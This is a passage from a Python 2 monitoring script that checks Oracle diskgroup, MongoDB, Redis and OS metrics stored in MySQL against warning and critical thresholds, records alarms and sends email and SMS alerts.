send_mail = func.update_send_mail_status(server_id,db_type,'tablespace(%s)' %(tablespace_name),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'tablespace(%s)' %(tablespace_name),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'tablespace(%s)' %(tablespace_name),max_rate,'warning','tablespace %s usage reach %s' %(tablespace_name,max_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('tablespace',2,host,port,create_time,'tablespace(%s)' %(tablespace_name),max_rate,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'tablespace(%s)' %(tablespace_name),max_rate,'tablespace %s usage ok' %(tablespace_name),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('tablespace',1,host,port,create_time,'tablespace','max(%s:%s)' %(tablespace_name,max_rate),'ok')
else:
pass
def get_alarm_oracle_diskgroup():
sql = """SELECT a.server_id,
a.diskgroup_name,
a.total_mb,
a.free_mb,
CONVERT(a.used_rate, DECIMAL(5,2)) as used_rate,
a.create_time,
b.HOST,
b.PORT,
b.alarm_asm_space,
b.threshold_warning_asm_space,
b.threshold_critical_asm_space,
b.send_mail,
b.send_mail_to_list,
b.send_sms,
b.send_sms_to_list,
b.tags,
'oracle' AS db_type
FROM oracle_diskgroup a, db_cfg_oracle b
WHERE a.server_id = b.id
and CONVERT(a.used_rate, DECIMAL(5,2)) >= b.threshold_warning_asm_space
ORDER BY used_rate desc """
result=func.mysql_query(sql)
if result <> 0:
for line in result:
#print "diskgroup_name: %s" %(line[1])
server_id=line[0]
diskgroup_name=line[1]
total_mb=line[2]
free_mb=line[3]
used_rate=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_asm_space=line[8]
threshold_warning_asm_space=line[9]
threshold_critical_asm_space=line[10]
send_mail=line[11]
send_mail_to_list=line[12]
send_sms=line[13]
send_sms_to_list=line[14]
tags=line[15]
db_type=line[16]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_asm_space)==1:
if int(used_rate) >= int(threshold_critical_asm_space):
send_mail = func.update_send_mail_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'diskgroup(%s)' %(diskgroup_name),used_rate,'critical','diskgroup %s usage reach %s' %(diskgroup_name,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('diskgroup',3,host,port,create_time,'diskgroup(%s)' %(diskgroup_name),used_rate,'critical')
elif int(used_rate) >= int(threshold_warning_asm_space):
send_mail = func.update_send_mail_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'diskgroup(%s)' %(diskgroup_name),used_rate,'warning','diskgroup %s usage reach %s' %(diskgroup_name,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('diskgroup',2,host,port,create_time,'diskgroup(%s)' %(diskgroup_name),used_rate,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'diskgroup(%s)' %(diskgroup_name),used_rate,'tablespace %s usage ok' %(diskgroup_name),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('diskgroup',1,host,port,create_time,'diskgroup','max(%s:%s)' %(diskgroup_name,used_rate),'ok')
else:
pass
def get_alarm_mongodb_status():
sql = "select a.server_id,a.connect,a.connections_current,a.globalLock_activeClients,a.globalLock_currentQueue,a.create_time,b.host,b.port,b.alarm_connections_current,b.alarm_active_clients,b.alarm_current_queue,b.threshold_warning_connections_current,b.threshold_critical_connections_current,b.threshold_warning_active_clients,b.threshold_critical_active_clients,b.threshold_warning_current_queue,b.threshold_critical_current_queue,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'mongodb' as db_type from mongodb_status a, db_cfg_mongodb b where a.server_id=b.id;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
connections_current=line[2]
globalLock_activeClients=line[3]
globalLock_currentQueue=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_connections_current=line[8]
alarm_active_clients=line[9]
alarm_current_queue=line[10]
threshold_warning_connections_current=line[11]
threshold_critical_connections_current=line[12]
threshold_warning_active_clients=line[13]
threshold_critical_active_clients=line[14]
threshold_warning_current_queue=line[15]
threshold_critical_current_queue=line[16]
send_mail=line[17]
send_mail_to_list=line[18]
send_sms=line[19]
send_sms_to_list=line[20]
tags=line[21]
db_type=line[22]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','mongodb server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','mongodb server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_connections_current)==1:
if int(connections_current) >= int(threshold_critical_connections_current):
send_mail = func.update_send_mail_status(server_id,db_type,'connections_current',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connections_current',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'critical','too many connections current',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'connections_current',connections_current,'critical')
elif int(connections_current) >= int(threshold_warning_connections_current):
send_mail = func.update_send_mail_status(server_id,db_type,'connections_current',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connections_current',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'critical','too many connections current',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'warning','too many connections current',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'connections_current',connections_current,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'connections current ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',1,host,port,create_time,'connections_current',connections_current,'ok')
if int(alarm_active_clients)==1:
if int(globalLock_activeClients) >= int(threshold_critical_active_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'active_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'active_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'critical','too many connections current',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'active_clients',globalLock_activeClients,'critical','too many active clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'active_clients',globalLock_activeClients,'critical')
elif int(globalLock_activeClients) >= int(threshold_warning_active_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'active_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'active_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'active_clients',globalLock_activeClients,'warning','too many active clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'active_clients',globalLock_activeClients,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'active_clients',globalLock_activeClients,'active clients ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',1,host,port,create_time,'active_clients',globalLock_activeClients,'ok')
if int(alarm_current_queue)==1:
if int(globalLock_currentQueue) >= int(threshold_critical_current_queue):
send_mail = func.update_send_mail_status(server_id,db_type,'current_queue',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'current_queue',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'current_queue',globalLock_currentQueue,'critical','too many current queue',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'current_queue',globalLock_currentQueue,'critical')
elif int(globalLock_currentQueue) >= int(threshold_warning_current_queue):
send_mail = func.update_send_mail_status(server_id,db_type,'current_queue',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'current_queue',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'current_queue',globalLock_currentQueue,'warning','too many current queue',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'current_queue',globalLock_currentQueue,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'current_queue',globalLock_currentQueue,'current queue ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',1,host,port,create_time,'current_queue',globalLock_currentQueue,'ok')
else:
pass
def get_alarm_redis_status():
sql = "select a.server_id,a.connect,a.connected_clients,a.current_commands_processed,a.blocked_clients,a.create_time,b.host,b.port,b.alarm_connected_clients,b.alarm_command_processed,b.alarm_blocked_clients,b.threshold_warning_connected_clients,b.threshold_critical_connected_clients,b.threshold_warning_command_processed,b.threshold_critical_command_processed,b.threshold_warning_blocked_clients,b.threshold_critical_blocked_clients,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'redis' as db_type from redis_status a, db_cfg_redis b where a.server_id=b.id ;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
connected_clients=line[2]
current_commands_processed=line[3]
blocked_clients=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_connected_clients=line[8]
alarm_command_processed=line[9]
alarm_blocked_clients=line[10]
threshold_warning_connected_clients=line[11]
threshold_critical_connected_clients=line[12]
threshold_warning_command_processed=line[13]
threshold_critical_command_processed=line[14]
threshold_warning_blocked_clients=line[15]
threshold_critical_blocked_clients=line[16]
send_mail=line[17]
send_mail_to_list=line[18]
send_sms=line[19]
send_sms_to_list=line[20]
tags=line[21]
db_type=line[22]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','redis server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','redis server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_connected_clients)==1:
if int(connected_clients) >= int(threshold_critical_connected_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'connected_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connected_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connected_clients',connected_clients,'critical','too many connected clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'connected_clients',connected_clients,'critical')
elif int(connected_clients) >= int(threshold_warning_connected_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'connected_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connected_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connected_clients',connected_clients,'warning','too many connected clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'connected_clients',connected_clients,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connected_clients',connected_clients,'connected clients ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',1,host,port,create_time,'connected_clients',connected_clients,'ok')
if int(alarm_command_processed)==1:
if int(current_commands_processed) >= int(threshold_critical_command_processed):
send_mail = func.update_send_mail_status(server_id,db_type,'command_processed',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'command_processed',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'command_processed',current_commands_processed,'critical','too many command processed',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'command_processed',current_commands_processed,'critical')
elif int(current_commands_processed) >= int(threshold_warning_command_processed):
send_mail = func.update_send_mail_status(server_id,db_type,'command_processed',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'command_processed',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'command_processed',current_commands_processed,'warning','too many command processed',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'command_processed',current_commands_processed,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'command_processed',current_commands_processed,'command processed ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',1,host,port,create_time,'command_processed',current_commands_processed,'ok')
if int(alarm_blocked_clients)==1:
if int(blocked_clients) >= int(threshold_critical_blocked_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'blocked_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'blocked_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'blocked_clients',blocked_clients,'critical','too many blocked clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'blocked_clients',blocked_clients,'critical')
elif int(blocked_clients) >= int(threshold_warning_blocked_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'blocked_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'blocked_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'blocked_clients',blocked_clients,'warning','too many blocked clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'blocked_clients',blocked_clients,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'blocked_clients',blocked_clients,'blocked clients ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',1,host,port,create_time,'blocked_clients',blocked_clients,'ok')
else:
pass
def get_alarm_os_status():
sql = "select a.ip,a.hostname,a.snmp,a.process,a.load_1,a.cpu_idle_time,a.mem_usage_rate,a.create_time,b.tags,b.alarm_os_process,b.alarm_os_load,b.alarm_os_cpu,b.alarm_os_memory,b.threshold_warning_os_process,b.threshold_critical_os_process,b.threshold_warning_os_load,b.threshold_critical_os_load,b.threshold_warning_os_cpu,b.threshold_critical_os_cpu,b.threshold_warning_os_memory,b.threshold_critical_os_memory,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list from os_status a,db_cfg_os b where a.ip=b.host"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
host=line[0]
hostname=line[1]
snmp=line[2]
process=line[3]
load_1=line[4]
cpu_idle=line[5]
memory_usage=line[6]
create_time=line[7]
tags=line[8]
alarm_os_process=line[9]
alarm_os_load=line[10]
alarm_os_cpu=line[11]
alarm_os_memory=line[12]
threshold_warning_os_process=line[13]
threshold_critical_os_process=line[14]
threshold_warning_os_load=line[15]
threshold_critical_os_load=line[16]
threshold_warning_os_cpu=line[17]
threshold_critical_os_cpu=line[18]
threshold_warning_os_memory=line[19]
threshold_critical_os_memory=line[20]
send_mail=line[21]
send_mail_to_list=line[22]
send_sms=line[23]
send_sms_to_list=line[24]
server_id=0
tags=tags
db_type="os"
port=''
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if snmp <> 1:
send_mail = func.update_send_mail_status(host,db_type,'snmp_server',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'snmp_server',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'snmp_server','down','critical','snmp server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('snmp','3',host,'',create_time,'snmp_server','down','critical')
func.update_db_status('process','-1',host,'','','','','')
func.update_db_status('load_1','-1',host,'','','','','')
func.update_db_status('cpu','-1',host,'','','','','')
func.update_db_status('memory','-1',host,'','','','','')
func.update_db_status('network','-1',host,'','','','','')
func.update_db_status('disk','-1',host,'','','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'snmp_server','up','snmp server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('snmp',1,host,'',create_time,'snmp_server','up','ok')
if int(alarm_os_process)==1:
if int(process) >= int(threshold_critical_os_process):
send_mail = func.update_send_mail_status(host,db_type,'process',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'process',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'process',process,'critical','too more process running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('process',3,host,'',create_time,'process',process,'critical')
elif int(process) >= int(threshold_warning_os_process):
send_mail = func.update_send_mail_status(host,db_type,'process',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'process',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'process',process,'warning','too more process running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('process',2,host,'',create_time,'process',process,'warning')
else:
func.update_db_status('process',1,host,'',create_time,'process',process,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'process',process,'process running ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_os_load)==1:
if int(load_1) >= int(threshold_critical_os_load):
send_mail = func.update_send_mail_status(host,db_type,'load',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'load',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'load',load_1,'critical','too high load',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('load_1',3,host,'',create_time,'load',load_1,'critical')
elif int(load_1) >= int(threshold_warning_os_load):
send_mail = func.update_send_mail_status(server_id,db_type,'load',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'load',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'load',load_1,'warning','too high load',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('load_1',2,host,'',create_time,'load',load_1,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'load',load_1,'load ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('load_1',1,host,'',create_time,'load',load_1,'ok')
if int(alarm_os_cpu)==1:
threshold_critical_os_cpu = int(100-threshold_critical_os_cpu)
threshold_warning_os_cpu = int(100-threshold_warning_os_cpu)
if int(cpu_idle) <= int(threshold_critical_os_cpu):
send_mail = func.update_send_mail_status(host,db_type,'cpu_idle',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'cpu_idle',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'cpu_idle',str(cpu_idle)+'%','critical','too little cpu idle',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('cpu',3,host,'',create_time,'cpu_idle',str(cpu_idle)+'%','critical')
elif int(cpu_idle) <= int(threshold_warning_os_cpu):
send_mail = func.update_send_mail_status(host,db_type,'cpu_idle',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'cpu_idle',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'cpu_idle',str(cpu_idle)+'%','warning','too little cpu idle',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('cpu',2,host,'',create_time,'cpu_idle',str(cpu_idle)+'%','warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'cpu_idle',str(cpu_idle)+'%','cpu idle ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('cpu',1,host,'',create_time,'cpu_idle',str(cpu_idle)+'%','ok')
if int(alarm_os_memory)==1:
if memory_usage:
memory_usage_int = int(memory_usage.split('%')[0])
else:
memory_usage_int = 0
if int(memory_usage_int) >= int(threshold_critical_os_memory):
send_mail = func.update_send_mail_status(host,db_type,'memory',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'memory',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'memory',memory_usage,'critical','too more memory usage',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('memory',3,host,'',create_time,'memory',memory_usage,'critical')
elif int(memory_usage_int) >= int(threshold_warning_os_memory):
send_mail = func.update_send_mail_status(host,db_type,'memory',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'memory',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'memory',memory_usage,'warning','too more memory usage',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('memory',2,host,'',create_time,'memory',memory_usage,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'memory',memory_usage,'memory usage ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('memory',1,host,'',create_time,'memory',memory_usage,'ok')
else:
pass
def get_alarm_os_disk():
sql="select a.ip,a.mounted,a.used_rate,a.create_time,b.tags,b.alarm_os_disk,b.threshold_warning_os_disk,b.threshold_critical_os_disk,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list from os_disk a,db_cfg_os b where a.ip=b.host group by ip,mounted order by SUBSTRING_INDEX(used_rate,'%',1)+0 asc;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
host=line[0]
mounted=line[1]
used_rate=line[2]
create_time=line[3]
tags=line[4]
alarm_os_disk=line[5]
threshold_warning_os_disk=line[6]
threshold_critical_os_disk=line[7]
send_mail=line[8]
send_mail_to_list=line[9]
send_sms=line[10]
send_sms_to_list=line[11]
server_id=0
tags=tags
db_type="os"
port=''
used_rate_arr=used_rate.split("%")
used_rate_int=int(used_rate_arr[0])
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_os_disk)==1:
if int(used_rate_int) >= int(threshold_critical_os_disk):
send_mail = func.update_send_mail_status(host,db_type,'disk_usage(%s)' %(mounted),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'disk_usage(%s)' %(mounted),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'disk_usage(%s)' %(mounted),used_rate,'critical','disk %s usage reach %s' %(mounted,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('disk',3,host,'',create_time,'disk_usage(%s)' %(mounted),used_rate,'critical')
elif int(used_rate_int) >= int(threshold_warning_os_disk):
send_mail = func.update_send_mail_status(host,db_type,'disk_usage(%s)' %(mounted),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'disk_usage(%s)' %(mounted),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'disk_usage(%s)' %(mounted),used_rate,'warning','disk %s usage reach %s' %(mounted,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('disk',2,host,'',create_time,'disk_usage(%s)' %(mounted),used_rate,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'disk_usage(%s)' %(mounted),used_rate,'disk %s usage ok' %(mounted),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('disk',1,host,'',create_time,'disk_usage','max(%s:%s)' %(mounted,used_rate),'ok')
else:
pass
def get_alarm_os_network():
sql="select a.ip,a.if_descr,a.in_bytes,a.out_bytes,sum(in_bytes+out_bytes) sum_bytes,a.create_time,b.tags,b.alarm_os_network,b.threshold_warning_os_network,b.threshold_critical_os_network,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list from os_net a,db_cfg_os b where a.ip=b.host group by ip,if_descr order by sum(in_bytes+out_bytes) asc;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
host=line[0]
if_descr=line[1]
in_bytes=line[2]
out_bytes=line[3]
sum_bytes=line[4]
create_time=line[5]
tags=line[6]
alarm_os_network=line[7]
threshold_warning_os_network=(line[8])*1024*1024
threshold_critical_os_network=(line[9])*1024*1024
send_mail=line[10]
send_mail_to_list=line[11]
send_sms=line[12]
send_sms_to_list=line[13]
server_id=0
tags=tags
db_type="os"
port=''
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_os_network)==1:
if int(sum_bytes) >= int(threshold_critical_os_network):
send_mail = func.update_send_mail_status(host,db_type,'network(%s)' %(if_descr),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'network(%s)' %(if_descr),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'network(%s)' %(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'critical','network %s bytes reach %s' %(if_descr,sum_bytes),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('network',3,host,'',create_time,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'critical')
elif int(sum_bytes) >= int(threshold_warning_os_network):
send_mail = func.update_send_mail_status(host,db_type,'network(%s)' %(if_descr),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'network(%s)' %(if_descr),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'warning','network %s bytes reach %s' %(if_descr,sum_bytes),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('network',2,host,'',create_time,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'network %s bytes ok' %(if_descr),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('network',1,host,'',create_time,'network','max(%s-in:%s,out:%s)' %(if_descr,in_bytes,out_bytes),'ok')
else:
pass
def send_alarm():
sql = "select tags,host,port,create_time,db_type,alarm_item,alarm_value,level,message,send_mail,send_mail_to_list,send_sms,send_sms_to_list,id alarm_id from alarm;"
result=func.mysql_query(sql)
if result <> 0:
send_alarm_mail = func.get_option('send_alarm_mail')
send_alarm_sms = func.get_option('send_alarm_sms')
for line in result:
tags=line[0]
host=line[1]
port=line[2]
create_time=line[3]
db_type=line[4]
alarm_item=line[5]
alarm_value=line[6]
level=line[7]
message=line[8]
send_mail=line[9]
send_mail_to_list=line[10]
send_sms=line[11]
send_sms_to_list=line[12]
alarm_id=line[13]
if port:
server = host+':'+port
else:
server = host
if send_mail_to_list:
mail_to_list=send_mail_to_list.split(';')
else:
send_mail=0
if send_sms_to_list:
sms_to_list=send_sms_to_list.split(';')
else:
send_sms=0
if int(send_alarm_mail)==1:
if send_mail==1:
mail_subject='['+level+'] '+db_type+'-'+tags+'-'+server+' '+message+' Time:'+create_time.strftime('%Y-%m-%d %H:%M:%S')
mail_content="""
Type: %s\n<br/>
Tags: %s\n<br/>
Host: %s:%s\n<br/>
Level: %s\n<br/>
Item: %s\n<br/>
Value: %s\n<br/>
Message: %s\n<br/>
""" %(db_type,tags,host,port,level,alarm_item,alarm_value,message)
result = sendmail.send_mail(mail_to_list,mail_subject,mail_content)
if result:
send_mail_status=1
else:
send_mail_status=0
else:
send_mail_status=0
else:
send_mail_status=0
if int(send_alarm_sms)==1:
if send_sms==1:
